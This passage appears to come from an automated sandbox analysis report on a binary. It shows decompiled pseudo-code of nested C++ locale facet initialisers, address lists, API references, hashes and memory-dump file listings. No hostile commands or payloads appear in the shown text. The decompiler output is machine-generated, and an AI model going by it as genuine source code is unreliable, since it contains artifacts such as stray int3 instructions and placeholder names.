																							if(_t360 == 0) {
																								_push( *((intOrPtr*)(_t373 + 8)));
																								_push(_t373 - 0x10);
																								__eflags = E6E19B1A4(_t260, _t350, _t360) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ec3ec, _t260, _t350, _t360, 8);
																									E6E18F2A5(_t373 - 0x14, 0);
																									_t361 =  *0x6e221738; // 0x0
																									 *(_t373 - 4) =  *(_t373 - 4) & 0x00000000;
																									 *(_t373 - 0x10) = _t361;
																									_t351 = E6E162171( *((intOrPtr*)(_t373 + 8)), E6E161F29(_t260, 0x6e2216e4, _t350, _t361));
																									__eflags = _t351;
																									if(_t351 != 0) {
																										L54:
																										E6E18F30C(_t373 - 0x14);
																										return E6E1A9D88(_t351);
																									} else {
																										__eflags = _t361;
																										if(_t361 == 0) {
																											_push( *((intOrPtr*)(_t373 + 8)));
																											_push(_t373 - 0x10);
																											__eflags = E6E19B210(_t260, _t351, _t361) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E161CB5(__eflags);
																												asm("int3");
																												E6E1A9DBF(0x6e1ec3ec, _t260, _t351, _t361, 8);
																												E6E18F2A5(_t373 - 0x14, 0);
																												_t362 =  *0x6e221708; // 0x0
																												 *(_t373 - 4) =  *(_t373 - 4) & 0x00000000;
																												 *(_t373 - 0x10) = _t362;
																												_t352 = E6E162171( *((intOrPtr*)(_t373 + 8)), E6E161F29(_t260, 0x6e221698, _t351, _t362));
																												__eflags = _t352;
																												if(_t352 != 0) {
																													L61:
																													E6E18F30C(_t373 - 0x14);
																													return E6E1A9D88(_t352);
																												} else {
																													__eflags = _t362;
																													if(_t362 == 0) {
																														_push( *((intOrPtr*)(_t373 + 8)));
																														_push(_t373 - 0x10);
																														_t215 = E6E19B284(_t260, _t352, _t362);
																														_pop(_t314);
																														__eflags = _t215 - 0xffffffff;
																														if(__eflags == 0) {
																															E6E161CB5(__eflags);
																															asm("int3");
																															E6E1A9DBF(0x6e1ecb1a, _t260, _t352, _t362, 4);
																															_t363 = _t314;
																															 *(_t373 - 0x10) = _t363;
																															 *((intOrPtr*)(_t363 + 4)) =  *((intOrPtr*)(_t373 + 0xc));
																															_push( *((intOrPtr*)(_t373 + 0x14)));
																															_t115 = _t373 - 4;
																															 *_t115 =  *(_t373 - 4) & 0x00000000;
																															__eflags =  *_t115;
																															 *_t363 = 0x6e1f225c;
																															 *((char*)(_t363 + 0x28)) =  *((intOrPtr*)(_t373 + 0x10));
																															E6E19F3D8(_t260, _t314, _t342, _t352, _t363,  *_t115);
																															return E6E1A9D88(_t363,  *((intOrPtr*)(_t373 + 8)));
																														} else {
																															_t352 =  *(_t373 - 0x10);
																															 *(_t373 - 0x10) = _t352;
																															 *(_t373 - 4) = 1;
																															E6E1911C1(__eflags, _t352);
																															 *0x6e1ee1b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																															 *0x6e221708 = _t352;
																															goto L61;
																														}
																													} else {
																														_t352 = _t362;
																														goto L61;
																													}
																												}
																											} else {
																												_t351 =  *(_t373 - 0x10);
																												 *(_t373 - 0x10) = _t351;
																												 *(_t373 - 4) = 1;
																												E6E1911C1(__eflags, _t351);
																												 *0x6e1ee1b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																												 *0x6e221738 = _t351;
																												goto L54;
																											}
																										} else {
																											_t351 = _t361;
																											goto L54;
																										}
																									}
																								} else {
																									_t350 =  *(_t373 - 0x10);
																									 *(_t373 - 0x10) = _t350;
																									 *(_t373 - 4) = 1;
																									E6E1911C1(__eflags, _t350);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
																									 *0x6e221704 = _t350;
																									goto L47;
																								}
																							} else {
																								_t350 = _t360;
																								goto L47;
																							}
																						}
																					} else {
																						_t349 =  *(_t373 - 0x10);
																						 *(_t373 - 0x10) = _t349;
																						 *(_t373 - 4) = 1;
																						E6E1911C1(__eflags, _t349);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
																						 *0x6e221734 = _t349;
																						goto L40;
																					}
																				} else {
																					_t349 = _t359;
																					goto L40;
																				}
																			}
																		} else {
																			_t348 =  *(_t373 - 0x10);
																			 *(_t373 - 0x10) = _t348;
																			 *(_t373 - 4) = 1;
																			E6E1911C1(__eflags, _t348);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
																			 *0x6e221718 = _t348;
																			goto L33;
																		}
																	} else {
																		_t348 = _t358;
																		goto L33;
																	}
																}
															} else {
																_t347 =  *(_t373 - 0x10);
																 *(_t373 - 0x10) = _t347;
																 *(_t373 - 4) = 1;
																E6E1911C1(__eflags, _t347);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t347 + 4))))();
																 *0x6e221714 = _t347;
																goto L26;
															}
														} else {
															_t347 = _t357;
															goto L26;
														}
													}
												} else {
													_t346 =  *(_t373 - 0x10);
													 *(_t373 - 0x10) = _t346;
													 *(_t373 - 4) = 1;
													E6E1911C1(__eflags, _t346);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t346 + 4))))();
													 *0x6e2216e8 = _t346;
													goto L19;
												}
											} else {
												_t346 = _t356;
												goto L19;
											}
										}
									} else {
										_t345 =  *(_t373 - 0x10);
										 *(_t373 - 0x10) = _t345;
										 *(_t373 - 4) = 1;
										E6E1911C1(__eflags, _t345);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t345 + 4))))();
										 *0x6e221710 = _t345;
										goto L12;
									}
								} else {
									_t345 = _t355;
									goto L12;
								}
							}
						} else {
							_t344 =  *(_t373 - 0x10);
							 *(_t373 - 0x10) = _t344;
							 *(_t373 - 4) = 1;
							E6E1911C1(__eflags, _t344);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t344 + 4))))();
							 *0x6e2216fc = _t344;
							goto L5;
						}
					} else {
						_t344 = _t354;
						goto L5;
					}
				}
			}

0x6e199409
0x6e199410
0x6e19941a
0x6e19941f
0x6e19942a
0x6e19942e
0x6e19943a
0x6e19943f
0x6e199443
0x6e199488
0x6e19948b
0x6e199497
0x6e199445
0x6e199447
0x6e19944d
0x6e199453
0x6e19945b
0x6e19945e
0x6e199498
0x6e19949d
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994d4
0x6e1994d6
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447

APIs

__EH_prolog3.LIBCMT ref: 6E199410
std::_Lockit::_Lockit.LIBCPMT ref: 6E19941A

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

moneypunct.LIBCPMT ref: 6E199454
std::_Facet_Register.LIBCPMT ref: 6E19946B
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19948B
Concurrency::cancel_current_task.LIBCPMT ref: 6E199498

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 2743796646-0
Opcode ID: 1d158d41a6790bf1fc1596d1cf1ad170c6903e4903fd7e20ad12b73d22eacb59
Instruction ID: 7642f4a12d3c785234d10d811e9be50fb0a5542de51db2306e885ad6f1c017d7
Opcode Fuzzy Hash: 1d158d41a6790bf1fc1596d1cf1ad170c6903e4903fd7e20ad12b73d22eacb59
Instruction Fuzzy Hash: 3C01D67590011ACFCB06DBE4C924AFD777A6F94314F244909E821AB380CF309AC4FB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E19924A, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E19924A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t158;
				void* _t284;
				signed int _t413;
				void* _t450;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				void* _t490;

				_t341 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t490 - 0x14, 0);
				_t465 =  *0x6e221730; // 0x0
				 *(_t490 - 4) =  *(_t490 - 4) & 0x00000000;
				 *(_t490 - 0x10) = _t465;
				_t158 = E6E162171( *((intOrPtr*)(_t490 + 8)), E6E161F29(__ebx, 0x6e2216dc, __edi, _t465));
				_t452 = _t158;
				if(_t158 != 0) {
					L5:
					E6E18F30C(_t490 - 0x14);
					return E6E1A9D88(_t452);
				} else {
					if(_t465 == 0) {
						_push( *((intOrPtr*)(_t490 + 8)));
						_push(_t490 - 0x10);
						__eflags = E6E19AD73(__ebx, _t452, _t465) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t341, _t452, _t465, 8);
							E6E18F2A5(_t490 - 0x14, 0);
							_t466 =  *0x6e22172c; // 0x0
							 *(_t490 - 4) =  *(_t490 - 4) & 0x00000000;
							 *(_t490 - 0x10) = _t466;
							_t453 = E6E162171( *((intOrPtr*)(_t490 + 8)), E6E161F29(_t341, 0x6e2216d8, _t452, _t466));
							__eflags = _t453;
							if(_t453 != 0) {
								L12:
								E6E18F30C(_t490 - 0x14);
								return E6E1A9D88(_t453);
							} else {
								__eflags = _t466;
								if(_t466 == 0) {
									_push( *((intOrPtr*)(_t490 + 8)));
									_push(_t490 - 0x10);
									__eflags = E6E19ADF7(_t341, _t453, _t466) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t341, _t453, _t466, 8);
										E6E18F2A5(_t490 - 0x14, 0);
										_t467 =  *0x6e221700; // 0x0
										 *(_t490 - 4) =  *(_t490 - 4) & 0x00000000;
										 *(_t490 - 0x10) = _t467;
										_t454 = E6E162171( *((intOrPtr*)(_t490 + 8)), E6E161F29(_t341, 0x6e2216b4, _t453, _t467));
										__eflags = _t454;
										if(_t454 != 0) {
											L19:
											E6E18F30C(_t490 - 0x14);
											return E6E1A9D88(_t454);
										} else {
											__eflags = _t467;
											if(_t467 == 0) {
												_push( *((intOrPtr*)(_t490 + 8)));
												_push(_t490 - 0x10);
												__eflags = E6E19AE7C(_t341, _t454, _t467) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t341, _t454, _t467, 8);
													E6E18F2A5(_t490 - 0x14, 0);
													_t468 =  *0x6e2216fc; // 0x0
													 *(_t490 - 4) =  *(_t490 - 4) & 0x00000000;
													 *(_t490 - 0x10) = _t468;
													_t455 = E6E162171( *((intOrPtr*)(_t490 + 8)), E6E161F29(_t341, 0x6e2216b0, _t454, _t468));
													__eflags = _t455;
													if(_t455 != 0) {
														L26:
														E6E18F30C(_t490 - 0x14);
														return E6E1A9D88(_t455);
													} else {
														__eflags = _t468;
														if(_t468 == 0) {
															_push( *((intOrPtr*)(_t490 + 8)));
															_push(_t490 - 0x10);
															__eflags = E6E19AF00(_t341, _t455, _t468) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t341, _t455, _t468, 8);
																E6E18F2A5(_t490 - 0x14, 0);
																_t469 =  *0x6e221710; // 0x0
																 *(_t490 - 4) =  *(_t490 - 4) & 0x00000000;
																 *(_t490 - 0x10) = _t469;
																_t456 = E6E162171( *((intOrPtr*)(_t490 + 8)), E6E161F29(_t341, 0x6e2216bc, _t455, _t469));
																__eflags = _t456;
																if(_t456 != 0) {
																	L33:
																	E6E18F30C(_t490 - 0x14);
																	return E6E1A9D88(_t456);
																} else {
																	__eflags = _t469;
																	if(_t469 == 0) {
																		_push( *((intOrPtr*)(_t490 + 8)));
																		_push(_t490 - 0x10);
																		__eflags = E6E19AF85(_t341, _t456, _t469) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t341, _t456, _t469, 8);
																			E6E18F2A5(_t490 - 0x14, 0);
																			_t470 =  *0x6e2216e8; // 0x0
																			 *(_t490 - 4) =  *(_t490 - 4) & 0x00000000;
																			 *(_t490 - 0x10) = _t470;
																			_t457 = E6E162171( *((intOrPtr*)(_t490 + 8)), E6E161F29(_t341, 0x6e22169c, _t456, _t470));
																			__eflags = _t457;
																			if(_t457 != 0) {
																				L40:
																				E6E18F30C(_t490 - 0x14);
																				return E6E1A9D88(_t457);
																			} else {
																				__eflags = _t470;
																				if(_t470 == 0) {
																					_push( *((intOrPtr*)(_t490 + 8)));
																					_push(_t490 - 0x10);
																					__eflags = E6E19AFED(_t341, _t457, _t470) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t341, _t457, _t470, 8);
																						E6E18F2A5(_t490 - 0x14, 0);
																						_t471 =  *0x6e221714; // 0x0
																						 *(_t490 - 4) =  *(_t490 - 4) & 0x00000000;
																						 *(_t490 - 0x10) = _t471;
																						_t458 = E6E162171( *((intOrPtr*)(_t490 + 8)), E6E161F29(_t341, 0x6e2216c0, _t457, _t471));
																						__eflags = _t458;
																						if(_t458 != 0) {
																							L47:
																							E6E18F30C(_t490 - 0x14);
																							return E6E1A9D88(_t458);
																						} else {
																							__eflags = _t471;
																							if(_t471 == 0) {
																								_push( *((intOrPtr*)(_t490 + 8)));
																								_push(_t490 - 0x10);
																								__eflags = E6E19B055(_t341, _t458, _t471) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ec3ec, _t341, _t458, _t471, 8);
																									E6E18F2A5(_t490 - 0x14, 0);
																									_t472 =  *0x6e221718; // 0x0
																									 *(_t490 - 4) =  *(_t490 - 4) & 0x00000000;
																									 *(_t490 - 0x10) = _t472;
																									_t459 = E6E162171( *((intOrPtr*)(_t490 + 8)), E6E161F29(_t341, 0x6e2216c4, _t458, _t472));
																									__eflags = _t459;
																									if(_t459 != 0) {
																										L54:
																										E6E18F30C(_t490 - 0x14);
																										return E6E1A9D88(_t459);
																									} else {
																										__eflags = _t472;
																										if(_t472 == 0) {
																											_push( *((intOrPtr*)(_t490 + 8)));
																											_push(_t490 - 0x10);
																											__eflags = E6E19B0BD(_t341, _t459, _t472) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E161CB5(__eflags);
																												asm("int3");
																												E6E1A9DBF(0x6e1ec3ec, _t341, _t459, _t472, 8);
																												E6E18F2A5(_t490 - 0x14, 0);
																												_t473 =  *0x6e221734; // 0x0
																												 *(_t490 - 4) =  *(_t490 - 4) & 0x00000000;
																												 *(_t490 - 0x10) = _t473;
																												_t460 = E6E162171( *((intOrPtr*)(_t490 + 8)), E6E161F29(_t341, 0x6e2216e0, _t459, _t473));
																												__eflags = _t460;
																												if(_t460 != 0) {
																													L61:
																													E6E18F30C(_t490 - 0x14);
																													return E6E1A9D88(_t460);
																												} else {
																													__eflags = _t473;
																													if(_t473 == 0) {
																														_push( *((intOrPtr*)(_t490 + 8)));
																														_push(_t490 - 0x10);
																														__eflags = E6E19B138(_t341, _t460, _t473) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E161CB5(__eflags);
																															asm("int3");
																															E6E1A9DBF(0x6e1ec3ec, _t341, _t460, _t473, 8);
																															E6E18F2A5(_t490 - 0x14, 0);
																															_t474 =  *0x6e221704; // 0x0
																															 *(_t490 - 4) =  *(_t490 - 4) & 0x00000000;
																															 *(_t490 - 0x10) = _t474;
																															_t461 = E6E162171( *((intOrPtr*)(_t490 + 8)), E6E161F29(_t341, 0x6e2216b8, _t460, _t474));
																															__eflags = _t461;
																															if(_t461 != 0) {
																																L68:
																																E6E18F30C(_t490 - 0x14);
																																return E6E1A9D88(_t461);
																															} else {
																																__eflags = _t474;
																																if(_t474 == 0) {
																																	_push( *((intOrPtr*)(_t490 + 8)));
																																	_push(_t490 - 0x10);
																																	__eflags = E6E19B1A4(_t341, _t461, _t474) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E161CB5(__eflags);
																																		asm("int3");
																																		E6E1A9DBF(0x6e1ec3ec, _t341, _t461, _t474, 8);
																																		E6E18F2A5(_t490 - 0x14, 0);
																																		_t475 =  *0x6e221738; // 0x0
																																		 *(_t490 - 4) =  *(_t490 - 4) & 0x00000000;
																																		 *(_t490 - 0x10) = _t475;
																																		_t462 = E6E162171( *((intOrPtr*)(_t490 + 8)), E6E161F29(_t341, 0x6e2216e4, _t461, _t475));
																																		__eflags = _t462;
																																		if(_t462 != 0) {
																																			L75:
																																			E6E18F30C(_t490 - 0x14);
																																			return E6E1A9D88(_t462);
																																		} else {
																																			__eflags = _t475;
																																			if(_t475 == 0) {
																																				_push( *((intOrPtr*)(_t490 + 8)));
																																				_push(_t490 - 0x10);
																																				__eflags = E6E19B210(_t341, _t462, _t475) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E161CB5(__eflags);
																																					asm("int3");
																																					E6E1A9DBF(0x6e1ec3ec, _t341, _t462, _t475, 8);
																																					E6E18F2A5(_t490 - 0x14, 0);
																																					_t476 =  *0x6e221708; // 0x0
																																					 *(_t490 - 4) =  *(_t490 - 4) & 0x00000000;
																																					 *(_t490 - 0x10) = _t476;
																																					_t463 = E6E162171( *((intOrPtr*)(_t490 + 8)), E6E161F29(_t341, 0x6e221698, _t462, _t476));
																																					__eflags = _t463;
																																					if(_t463 != 0) {
																																						L82:
																																						E6E18F30C(_t490 - 0x14);
																																						return E6E1A9D88(_t463);
																																					} else {
																																						__eflags = _t476;
																																						if(_t476 == 0) {
																																							_push( *((intOrPtr*)(_t490 + 8)));
																																							_push(_t490 - 0x10);
																																							_t284 = E6E19B284(_t341, _t463, _t476);
																																							_pop(_t413);
																																							__eflags = _t284 - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E161CB5(__eflags);
																																								asm("int3");
																																								E6E1A9DBF(0x6e1ecb1a, _t341, _t463, _t476, 4);
																																								_t477 = _t413;
																																								 *(_t490 - 0x10) = _t477;
																																								 *((intOrPtr*)(_t477 + 4)) =  *((intOrPtr*)(_t490 + 0xc));
																																								_push( *((intOrPtr*)(_t490 + 0x14)));
																																								_t151 = _t490 - 4;
																																								 *_t151 =  *(_t490 - 4) & 0x00000000;
																																								__eflags =  *_t151;
																																								 *_t477 = 0x6e1f225c;
																																								 *((char*)(_t477 + 0x28)) =  *((intOrPtr*)(_t490 + 0x10));
																																								E6E19F3D8(_t341, _t413, _t450, _t463, _t477,  *_t151);
																																								return E6E1A9D88(_t477,  *((intOrPtr*)(_t490 + 8)));
																																							} else {
																																								_t463 =  *(_t490 - 0x10);
																																								 *(_t490 - 0x10) = _t463;
																																								 *(_t490 - 4) = 1;
																																								E6E1911C1(__eflags, _t463);
																																								 *0x6e1ee1b4();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t463 + 4))))();
																																								 *0x6e221708 = _t463;
																																								goto L82;
																																							}
																																						} else {
																																							_t463 = _t476;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t462 =  *(_t490 - 0x10);
																																					 *(_t490 - 0x10) = _t462;
																																					 *(_t490 - 4) = 1;
																																					E6E1911C1(__eflags, _t462);
																																					 *0x6e1ee1b4();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t462 + 4))))();
																																					 *0x6e221738 = _t462;
																																					goto L75;
																																				}
																																			} else {
																																				_t462 = _t475;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t461 =  *(_t490 - 0x10);
																																		 *(_t490 - 0x10) = _t461;
																																		 *(_t490 - 4) = 1;
																																		E6E1911C1(__eflags, _t461);
																																		 *0x6e1ee1b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t461 + 4))))();
																																		 *0x6e221704 = _t461;
																																		goto L68;
																																	}
																																} else {
																																	_t461 = _t474;
																																	goto L68;
																																}
																															}
																														} else {
																															_t460 =  *(_t490 - 0x10);
																															 *(_t490 - 0x10) = _t460;
																															 *(_t490 - 4) = 1;
																															E6E1911C1(__eflags, _t460);
																															 *0x6e1ee1b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t460 + 4))))();
																															 *0x6e221734 = _t460;
																															goto L61;
																														}
																													} else {
																														_t460 = _t473;
																														goto L61;
																													}
																												}
																											} else {
																												_t459 =  *(_t490 - 0x10);
																												 *(_t490 - 0x10) = _t459;
																												 *(_t490 - 4) = 1;
																												E6E1911C1(__eflags, _t459);
																												 *0x6e1ee1b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t459 + 4))))();
																												 *0x6e221718 = _t459;
																												goto L54;
																											}
																										} else {
																											_t459 = _t472;
																											goto L54;
																										}
																									}
																								} else {
																									_t458 =  *(_t490 - 0x10);
																									 *(_t490 - 0x10) = _t458;
																									 *(_t490 - 4) = 1;
																									E6E1911C1(__eflags, _t458);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t458 + 4))))();
																									 *0x6e221714 = _t458;
																									goto L47;
																								}
																							} else {
																								_t458 = _t471;
																								goto L47;
																							}
																						}
																					} else {
																						_t457 =  *(_t490 - 0x10);
																						 *(_t490 - 0x10) = _t457;
																						 *(_t490 - 4) = 1;
																						E6E1911C1(__eflags, _t457);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t457 + 4))))();
																						 *0x6e2216e8 = _t457;
																						goto L40;
																					}
																				} else {
																					_t457 = _t470;
																					goto L40;
																				}
																			}
																		} else {
																			_t456 =  *(_t490 - 0x10);
																			 *(_t490 - 0x10) = _t456;
																			 *(_t490 - 4) = 1;
																			E6E1911C1(__eflags, _t456);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t456 + 4))))();
																			 *0x6e221710 = _t456;
																			goto L33;
																		}
																	} else {
																		_t456 = _t469;
																		goto L33;
																	}
																}
															} else {
																_t455 =  *(_t490 - 0x10);
																 *(_t490 - 0x10) = _t455;
																 *(_t490 - 4) = 1;
																E6E1911C1(__eflags, _t455);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t455 + 4))))();
																 *0x6e2216fc = _t455;
																goto L26;
															}
														} else {
															_t455 = _t468;
															goto L26;
														}
													}
												} else {
													_t454 =  *(_t490 - 0x10);
													 *(_t490 - 0x10) = _t454;
													 *(_t490 - 4) = 1;
													E6E1911C1(__eflags, _t454);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t454 + 4))))();
													 *0x6e221700 = _t454;
													goto L19;
												}
											} else {
												_t454 = _t467;
												goto L19;
											}
										}
									} else {
										_t453 =  *(_t490 - 0x10);
										 *(_t490 - 0x10) = _t453;
										 *(_t490 - 4) = 1;
										E6E1911C1(__eflags, _t453);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t453 + 4))))();
										 *0x6e22172c = _t453;
										goto L12;
									}
								} else {
									_t453 = _t466;
									goto L12;
								}
							}
						} else {
							_t452 =  *(_t490 - 0x10);
							 *(_t490 - 0x10) = _t452;
							 *(_t490 - 4) = 1;
							E6E1911C1(__eflags, _t452);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t452 + 4))))();
							 *0x6e221730 = _t452;
							goto L5;
						}
					} else {
						_t452 = _t465;
						goto L5;
					}
				}
			}

0x6e19924a
0x6e199251
0x6e19925b
0x6e199260
0x6e19926b
0x6e19926f
0x6e19927b
0x6e199280
0x6e199284
0x6e1992c9
0x6e1992cc
0x6e1992d8
0x6e199286
0x6e199288
0x6e19928e
0x6e199294
0x6e19929c
0x6e19929f
0x6e1992d9
0x6e1992de
